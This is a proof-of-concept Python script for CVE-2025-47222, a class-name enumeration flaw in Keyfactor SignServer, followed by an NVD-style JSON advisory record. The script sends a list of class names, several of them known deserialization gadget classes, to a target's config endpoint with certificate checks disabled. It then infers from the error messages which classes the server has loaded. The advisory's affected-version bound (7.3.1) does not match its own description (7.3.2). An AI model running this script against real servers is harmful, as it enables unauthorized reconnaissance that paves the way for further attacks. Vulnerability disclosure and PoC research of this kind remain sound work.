CVE-2025-47222

# CVE-2025-47222 Class Name Enumeration PoC # Target: Keyfactor SignServer < 7.3.2 # Vulnerability: Class name enumeration leading to information disclosure import requests import json import sys TARGET_URL = "http://target-server:8080/signserver" COMMON_CLASSES = [ "org.apache.commons.io.FileUtils", "org.apache.log4j.Logger", "org.springframework.web.context.ContextLoaderListener", "com.sun.rowset.JdbcRowSetImpl", "org.apache.commons.collections.Transformer", "org.apache.shiro.subject.SimplePrincipalCollection", "com.fasterxml.jackson.databind.ObjectMapper", "org.bouncycastle.jce.provider.BouncyCastleProvider", "org.opensaml.xml.parse.StaticBasicParserPool" ] def test_class_enumeration(): """Test for class name enumeration vulnerability""" results = [] for class_name in COMMON_CLASSES: try: payload = { "className": class_name, "workerType": "SomeWorker" } response = requests.post( f"{TARGET_URL}/config", json=payload, timeout=10, verify=False ) # Analyze response to determine if class exists if response.status_code == 200: if "class not found" not in response.text.lower(): results.append({ "class": class_name, "exists": True, "response_length": len(response.text) }) else: results.append({ "class": class_name, "exists": False, "response_length": len(response.text) }) except Exception as e: print(f"Error testing {class_name}: {e}") return results if __name__ == "__main__": print("CVE-2025-47222 Class Name Enumeration Test") print("=" * 50) results = test_class_enumeration() for r in results: status = "EXISTS" if r["exists"] else "NOT FOUND" print(f"{r['class']}: {status}")

{"cve": {"id": "CVE-2025-47222", "sourceIdentifier": "[email protected]", "published": "2025-11-13T21:15:49.707", "lastModified": "2025-12-17T20:15:55.297", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A class name enumeration was found in Keyfactor SignServer versions prior to 7.3.2. Setting any chosen class name to any of the properties requiring a class path and the provided class is not expected to return different errors if the class exists in deployment or not. This returns information about the classes loaded in the application or not to the clientside."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.3.1", "matchCriteriaId": "D27BE713-6FAA-452D-BDD4-784A8FEF0801"}]}]}], "references": [{"url": "https://docs.keyfactor.com/signserver/latest/signserver-7-3-release-notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://support.keyfactor.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://support.keyfactor.com/hc/en-us/articles/37639174814235-SignServer-CVE-2025-47222-Class-name-enumeration", "source": "[email protected]"}]}}